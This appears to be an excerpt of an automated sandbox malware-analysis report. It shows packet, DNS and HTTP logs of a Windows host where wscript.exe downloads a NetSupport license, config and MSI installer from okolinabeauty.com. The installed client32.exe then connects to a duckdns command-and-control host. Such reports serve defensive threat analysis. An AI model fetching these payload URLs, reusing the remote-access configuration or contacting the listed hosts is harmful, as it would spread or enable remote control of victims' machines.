                                                                                                                      Nov 23, 2024 02:37:56.950609922 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:56.950613976 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:56.950655937 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:56.954900980 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:56.954914093 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:56.954988003 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:56.954993963 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:56.955034971 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:56.959583998 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:56.959599018 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:56.959666014 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:56.959671021 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:56.959716082 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:56.963387966 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:56.963402033 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:56.963469028 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:56.963471889 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:56.963520050 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.126605034 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.126621008 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.126708031 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.126715899 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.126765966 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.130393982 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.130408049 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.130475998 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.130481005 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.130525112 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.135035038 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.135050058 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.135128975 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.135133982 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.135180950 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.138839006 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.138856888 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.138909101 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.138911963 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.138937950 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.138961077 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.143466949 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.143481970 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.143560886 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.143565893 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.143613100 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.147006989 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.147020102 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.147094011 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.147099018 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.147145033 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.151638031 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.151652098 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.151730061 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.151735067 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.151782036 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.155457973 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.155471087 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.155544996 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.155550957 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.155595064 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.318584919 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.318598986 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.318809032 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.318815947 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.318861008 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.322392941 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.322407961 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.322496891 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.322501898 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.322554111 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.326988935 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.327003002 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.327070951 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.327075958 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.327116013 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.330770969 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.330784082 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.330867052 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.330872059 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.330926895 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.335448980 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.335464001 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.335540056 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.335542917 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.335588932 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.338953972 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.338970900 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.339032888 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.339037895 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.339072943 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.343605042 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.343616962 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.343687057 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.343693018 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.343734980 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.347414017 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.347426891 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.347491980 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.347496986 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.347539902 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.510540962 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.510560036 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.510637999 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.510646105 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.510690928 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.514348984 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.514364004 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.514435053 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.514440060 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.514487028 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.518940926 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.518954039 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.519037008 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.519042015 CET44349732176.126.113.166192.168.2.4
                                                                                                                      Nov 23, 2024 02:37:57.519093990 CET49732443192.168.2.4176.126.113.166
                                                                                                                      Nov 23, 2024 02:37:57.523236036 CET44349732176.126.113.166192.168.2.4

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Nov 23, 2024 02:37:07.829821110 CET192.168.2.41.1.1.10x3f39Standard query (0)okolinabeauty.comA (IP address)IN (0x0001)false
                                                                                                                      Nov 23, 2024 02:38:38.075795889 CET192.168.2.41.1.1.10x7b4bStandard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                                                      Nov 23, 2024 02:38:40.086179018 CET192.168.2.41.1.1.10xbf5dStandard query (0)megaeth1337.duckdns.orgA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Nov 23, 2024 02:37:08.225605965 CET1.1.1.1192.168.2.40x3f39No error (0)okolinabeauty.com176.126.113.166A (IP address)IN (0x0001)false
                                                                                                                      Nov 23, 2024 02:38:38.307810068 CET1.1.1.1192.168.2.40x7b4bNo error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                                      Nov 23, 2024 02:38:38.307810068 CET1.1.1.1192.168.2.40x7b4bNo error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                                      Nov 23, 2024 02:38:38.307810068 CET1.1.1.1192.168.2.40x7b4bNo error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                                      Nov 23, 2024 02:38:40.404251099 CET1.1.1.1192.168.2.40xbf5dNo error (0)megaeth1337.duckdns.org185.170.144.66A (IP address)IN (0x0001)false

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.449826104.26.0.231802676C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 23, 2024 02:38:38.477178097 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                      Host: geo.netsupportsoftware.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Nov 23, 2024 02:38:39.978292942 CET966INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 23 Nov 2024 01:38:39 GMT
                                                                                                                      Content-Type: text/html; Charset=utf-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: keep-alive
                                                                                                                      CF-Ray: 8e6d70e48b7b6a5f-EWR
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Cache-Control: private
                                                                                                                      Set-Cookie: ASPSESSIONIDQQCBTTCT=GEHFDOODLDNCLDIIIIMNKKNL; path=/
                                                                                                                      cf-apo-via: origin,host
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1UpHidjZ7%2BUKJXviXUJTQFKB%2F6CcZBkAnradnOHc1TK7hHXi7t8ITK%2FGCr1cMJUvDi5VQke4UVhy9JeQ0ah3haMQKzyMlnWSY7DJFyr%2Bz6k2xS%2FwW0Eha0fk0vLU6vf%2BYqMAQ%2F2mHtwqYfY"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1694&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a
                                                                                                                      Data Ascii: 1040.7357,-74.1724
                                                                                                                      Nov 23, 2024 02:38:40.219506979 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.449832185.170.144.6617732676C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 23, 2024 02:38:40.549415112 CET203OUTGET / HTTP/1.1
                                                                                                                      Connection: Upgrade
                                                                                                                      Upgrade: websocket
                                                                                                                      User-Agent: NetSupport Manager/1.3
                                                                                                                      Sec-WebSocket-Key: 9Bnq7QJqg8kCGoqK+ufHdg==
                                                                                                                      Sec-WebSocket-Version: 13
                                                                                                                      Host: megaeth1337.duckdns.org:1773
                                                                                                                      Nov 23, 2024 02:38:41.882121086 CET129INHTTP/1.1 101 Switching Protocols
                                                                                                                      Upgrade: websocket
                                                                                                                      Connection: Upgrade
                                                                                                                      Sec-WebSocket-Accept: LquSmZ5Hh0o225e2w+YQyViOEy4=


                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.449730176.126.113.1664432496C:\Windows\SysWOW64\wscript.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-23 01:37:10 UTC313OUTGET /choh/NSM.lic HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-ch
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                      Host: okolinabeauty.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-23 01:37:10 UTC240INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sat, 23 Nov 2024 01:37:10 GMT
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Length: 253
                                                                                                                      Last-Modified: Tue, 12 Nov 2024 14:38:33 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "67336869-fd"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-11-23 01:37:10 UTC253INData Raw: 31 34 30 30 0d 0a 30 78 39 38 66 31 37 37 64 62 0d 0a 0d 0a 3b 20 4e 65 74 53 75 70 70 6f 72 74 20 4c 69 63 65 6e 73 65 20 46 69 6c 65 2e 0d 0a 3b 20 47 65 6e 65 72 61 74 65 64 20 6f 6e 20 30 32 3a 35 39 20 2d 20 31 35 2f 30 39 2f 32 30 32 32 0d 0a 0d 0a 0d 0a 0d 0a 5b 5b 45 6e 66 6f 72 63 65 5d 5d 0d 0a 0d 0a 5b 5f 4c 69 63 65 6e 73 65 5d 0d 0a 63 6f 6e 74 72 6f 6c 5f 6f 6e 6c 79 3d 30 0d 0a 65 78 70 69 72 79 3d 0d 0a 69 6e 61 63 74 69 76 65 3d 30 0d 0a 6c 69 63 65 6e 73 65 65 3d 4e 53 4d 31 32 33 34 0d 0a 6d 61 78 73 6c 61 76 65 73 3d 39 39 39 39 0d 0a 6f 73 32 3d 31 0d 0a 70 72 6f 64 75 63 74 3d 31 30 0d 0a 73 65 72 69 61 6c 5f 6e 6f 3d 4e 53 4d 31 32 33 34 0d 0a 73 68 72 69 6e 6b 5f 77 72 61 70 3d 30 0d 0a 74 72 61 6e 73 70 6f 72 74 3d 30 0d 0a
                                                                                                                      Data Ascii: 14000x98f177db; NetSupport License File.; Generated on 02:59 - 15/09/2022[[Enforce]][_License]control_only=0expiry=inactive=0licensee=NSM1234maxslaves=9999os2=1product=10serial_no=NSM1234shrink_wrap=0transport=0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.449731176.126.113.1664432496C:\Windows\SysWOW64\wscript.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-23 01:37:11 UTC318OUTGET /choh/Client32.ini HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-ch
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                      Host: okolinabeauty.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-23 01:37:12 UTC241INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sat, 23 Nov 2024 01:37:12 GMT
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Length: 837
                                                                                                                      Last-Modified: Tue, 12 Nov 2024 14:38:33 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "67336869-345"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-11-23 01:37:12 UTC837INData Raw: 30 78 61 37 63 64 37 33 64 38 0d 0a 0d 0a 5b 43 6c 69 65 6e 74 5d 0d 0a 5f 70 72 65 73 65 6e 74 3d 31 0d 0a 44 69 73 61 62 6c 65 43 68 61 74 3d 31 0d 0a 44 69 73 61 62 6c 65 43 68 61 74 4d 65 6e 75 3d 31 0d 0a 44 69 73 61 62 6c 65 43 6c 69 65 6e 74 43 6f 6e 6e 65 63 74 3d 31 0d 0a 44 69 73 61 62 6c 65 43 6c 6f 73 65 41 70 70 73 3d 30 0d 0a 44 69 73 61 62 6c 65 44 69 73 63 6f 6e 6e 65 63 74 3d 31 0d 0a 44 69 73 61 62 6c 65 4c 6f 63 61 6c 49 6e 76 65 6e 74 6f 72 79 3d 31 0d 0a 44 69 73 61 62 6c 65 4d 61 6e 61 67 65 53 65 72 76 69 63 65 73 3d 30 0d 0a 44 69 73 61 62 6c 65 4d 65 73 73 61 67 65 3d 31 0d 0a 44 69 73 61 62 6c 65 52 65 70 6c 61 79 4d 65 6e 75 3d 31 0d 0a 44 69 73 61 62 6c 65 52 65 71 75 65 73 74 48 65 6c 70 3d 31 0d 0a 49 67 6e 6f 72 65 42 72 6f
                                                                                                                      Data Ascii: 0xa7cd73d8[Client]_present=1DisableChat=1DisableChatMenu=1DisableClientConnect=1DisableCloseApps=0DisableDisconnect=1DisableLocalInventory=1DisableManageServices=0DisableMessage=1DisableReplayMenu=1DisableRequestHelp=1IgnoreBro


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.449732176.126.113.1664432496C:\Windows\SysWOW64\wscript.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-23 01:37:13 UTC314OUTGET /choh/vrep.msi HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-ch
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                      Host: okolinabeauty.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-23 01:37:14 UTC250INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sat, 23 Nov 2024 01:37:14 GMT
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Content-Length: 41645568
                                                                                                                      Last-Modified: Tue, 12 Nov 2024 14:38:35 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "6733686b-27b7600"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-11-23 01:37:14 UTC16134INData Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 7c 02 00 00 01 00 00 00 00 00 00 00 00 10 00 00 38 00 00 00 09 00 00 00 80 36 00 00 05 00 00 00 00 00 00 00 80 00 00 00 00 01 00 00 7f 01 00 00 00 02 00 00 7f 02 00 00 00 03 00 00 7f 03 00 00 ff 03 00 00 80 04 00 00 00 05 00 00 80 05 00 00 ff 05 00 00 80 06 00 00 ff 06 00 00 80 07 00 00 ff 07 00 00 80 08 00 00 ff 08 00 00 7f 09 00 00 00 0a 00 00 7f 0a 00 00 00 0b 00 00 7f 0b 00 00 00 0c 00 00 7f 0c 00 00 00 0d 00 00 7f 0d 00 00 ff 0d 00 00 80 0e 00 00 ff 0e 00 00 80 0f 00 00 ff 0f 00 00 80 10 00 00 ff 10 00 00 80 11 00 00 ff 11 00 00 80 12 00 00 ff 12 00 00 80 13 00 00 ff 13 00 00 80 14 00 00 ff 14 00 00 80 15 00 00 ff 15 00
                                                                                                                      Data Ascii: >|86
                                                                                                                      2024-11-23 01:37:14 UTC16384INData Raw: 65 73 20 75 6e 64 65 72 20 77 68 69 63 68 20 63 6f 6e 64 69 74 69 6f 6e 73 20 74 68 65 20 61 63 74 69 6f 6e 20 73 68 6f 75 6c 64 20 62 65 20 74 72 69 67 67 65 72 65 64 2e 41 6e 20 69 6e 74 65 67 65 72 20 75 73 65 64 20 74 6f 20 6f 72 64 65 72 20 73 65 76 65 72 61 6c 20 65 76 65 6e 74 73 20 74 69 65 64 20 74 6f 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 6f 6c 2e 20 43 61 6e 20 62 65 20 6c 65 66 74 20 62 6c 61 6e 6b 2e 41 20 66 6f 72 65 69 67 6e 20 6b 65 79 20 74 6f 20 74 68 65 20 43 6f 6e 74 72 6f 6c 20 74 61 62 6c 65 2c 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 41 6e 20 69 64 65 6e 74 69 66 69 65 72 20 74 68 61 74 20 73 70 65 63 69 66 69 65 73 20 74 68 65 20 74 79 70 65 20 6f 66 20 74 68 65 20 65 76 65 6e 74 20 74 68 61 74 20 73 68 6f
                                                                                                                      Data Ascii: es under which conditions the action should be triggered.An integer used to order several events tied to the same control. Can be left blank.A foreign key to the Control table, name of the controlAn identifier that specifies the type of the event that sho
                                                                                                                      2024-11-23 01:37:14 UTC16384INData Raw: 61 83 5c 83 75 83 6e 83 5d 83 5f 83 67 83 66 83 55 83 5b 83 ec 85 06 80 01 99 07 80 b6 83 d6 86 bc 82 52 83 04 99 c2 81 15 00 67 00 01 00 7d 00 01 00 9f 00 07 00 36 00 01 00 37 00 5f 00 41 04 42 04 43 04 4c 04 4d 04 4e 04 4f 04 50 04 51 04 60 04 6a 04 6e 04 70 04 82 04 95 04 a2 04 b3 04 b4 04 b5 04 b6 04 b7 04 b9 04 ba 04 bb 04 bd 04 be 04 c3 04 c4 04 c5 04 c6 04 ca 04 cc 04 cd 04 d1 04 d3 04 d6 04 da 04 dc 04 de 04 e0 04 e1 04 e3 04 e5 04 e8 04 ea 04 ec 04 ed 04 ef 04 fc 04 fd 04 fe 04 ff 04 00 05 02 05 03 05 07 05 09 05 0b 05 0d 05 0e 05 0f 05 10 05 11 05 12 05 13 05 14 05 15 05 16 05 17 05 18 05 19 05 1a 05 1b 05 1c 05 1d 05 1e 05 1f 05 20 05 21 05 22 05 23 05 24 05 25 05 27 05 29 05 2b 05 30 05 32 05 34 05 38 05 3b 05 3d 05 3f 05 41 05 43 05 45 05 47
                                                                                                                      Data Ascii: a\un]_gfU[Rg}67_ABCLMNOPQ`jnp !"#$%')+0248;=?ACEG
                                                                                                                      2024-11-23 01:37:14 UTC16384INData Raw: 34 36 44 41 2d 38 46 38 46 2d 33 44 45 39 30 38 37 38 36 41 38 41 7d 68 74 63 74 6c 33 32 2e 64 6c 6c 7b 36 41 42 39 32 46 39 44 2d 35 38 43 45 2d 34 37 32 39 2d 42 45 30 46 2d 46 46 33 43 31 31 38 31 41 44 43 35 7d 69 63 6f 76 69 65 77 65 72 2e 64 6c 6c 7b 42 32 44 33 37 33 30 41 2d 38 39 41 36 2d 34 31 33 45 2d 38 34 43 45 2d 34 30 35 36 33 32 36 37 38 38 30 35 7d 7b 41 30 32 45 31 44 38 43 2d 36 33 34 44 2d 34 31 39 37 2d 39 36 37 31 2d 31 32 38 30 30 43 31 35 37 38 33 35 7d 69 73 6d 65 74 72 6f 2e 65 78 65 7b 38 36 38 43 37 35 37 37 2d 45 35 39 36 2d 34 46 34 36 2d 41 45 39 32 2d 34 33 44 30 33 39 33 41 33 34 37 39 7d 6c 6f 67 6f 2e 70 6e 67 31 7b 32 32 44 41 37 31 34 37 2d 38 43 41 44 2d 34 33 45 32 2d 38 37 43 38 2d 46 46 34 32 46 34 45 42 33 39 33
                                                                                                                      Data Ascii: 46DA-8F8F-3DE908786A8A}htctl32.dll{6AB92F9D-58CE-4729-BE0F-FF3C1181ADC5}icoviewer.dll{B2D3730A-89A6-413E-84CE-405632678805}{A02E1D8C-634D-4197-9671-12800C157835}ismetro.exe{868C7577-E596-4F46-AE92-43D0393A3479}logo.png1{22DA7147-8CAD-43E2-87C8-FF42F4EB393
                                                                                                                      2024-11-23 01:37:14 UTC16384INData Raw: 74 61 6c 6c 69 6e 67 20 43 4f 4d 2b 20 61 70 70 6c 69 63 61 74 69 6f 6e 3a 20 5b 31 5d 49 53 5f 43 4f 4d 50 4c 55 53 5f 50 52 4f 47 52 45 53 53 54 45 58 54 5f 43 4f 53 54 55 6e 69 6e 73 74 61 6c 6c 69 6e 67 20 43 4f 4d 2b 20 61 70 70 6c 69 63 61 74 69 6f 6e 3a 20 5b 31 5d 49 53 5f 43 4f 4d 50 4c 55 53 5f 50 52 4f 47 52 45 53 53 54 45 58 54 5f 49 4e 53 54 41 4c 4c 43 6f 73 74 69 6e 67 20 58 4d 4c 20 66 69 6c 65 73 2e 2e 2e 49 53 5f 43 4f 4d 50 4c 55 53 5f 50 52 4f 47 52 45 53 53 54 45 58 54 5f 55 4e 49 4e 53 54 41 4c 4c 43 72 65 61 74 69 6e 67 20 58 4d 4c 20 66 69 6c 65 20 25 73 2e 2e 2e 49 53 5f 50 52 4f 47 4d 53 47 5f 58 4d 4c 5f 43 4f 53 54 49 4e 47 50 65 72 66 6f 72 6d 69 6e 67 20 58 4d 4c 20 66 69 6c 65 20 63 68 61 6e 67 65 73 2e 2e 2e 49 53 5f 50 52
                                                                                                                      Data Ascii: talling COM+ application: [1]IS_COMPLUS_PROGRESSTEXT_COSTUninstalling COM+ application: [1]IS_COMPLUS_PROGRESSTEXT_INSTALLCosting XML files...IS_COMPLUS_PROGRESSTEXT_UNINSTALLCreating XML file %s...IS_PROGMSG_XML_COSTINGPerforming XML file changes...IS_PR
